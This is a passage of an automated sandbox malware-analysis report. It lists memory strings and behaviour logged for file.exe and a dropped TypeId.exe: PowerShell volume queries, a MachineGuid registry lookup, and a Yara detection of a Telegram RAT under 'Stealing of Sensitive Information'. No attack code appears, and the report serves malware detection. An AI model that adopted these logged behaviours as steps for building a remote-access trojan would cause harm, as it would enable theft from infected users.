                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqx
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL_
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLb
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqt2x
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLd
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq{
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLf
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLW
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq~
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq}
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLY
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|Cf
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL\
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL[
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX<b
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL]
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqh
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLR
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcql
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLT
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLV
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqj
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqx:h
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqp
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqo
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqt
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq`v
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLx
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLw
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLz
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq Om
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL|
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL$_
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLt
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqp+c
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLv
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLu
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLh
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLj
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLi
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLn
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqx;q
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq8
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP(
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq;
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq:
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP)
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq=
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq,hy
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqB
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqlgY
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq'
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq,
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqdVZ
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq$Wz
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq0
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX>W
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq4
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq3
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq1
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqW
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPC
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqV
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqZ
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqY
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqp.a
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq`
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq0rc
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP>
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqd
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP?
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqa
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPA
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP4
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(ad
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq Pv
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqJ
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqI
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP9
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP+
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP-
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqM
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP0
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqR
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(;
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(@
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq$1e
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq({t
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(6
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(8
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhx
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(7
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(9
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(+
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhr
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhq
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhd
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhc
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(#
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq(%
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq((
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhg
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Users\user\AppData\Local\Temp\file.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeQueries volume information: C:\Users\user\AppData\Roaming\TypeId.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeQueries volume information: C:\Users\user\AppData\Roaming\TypeId.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: 00000006.00000002.4559068186.0000000002529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
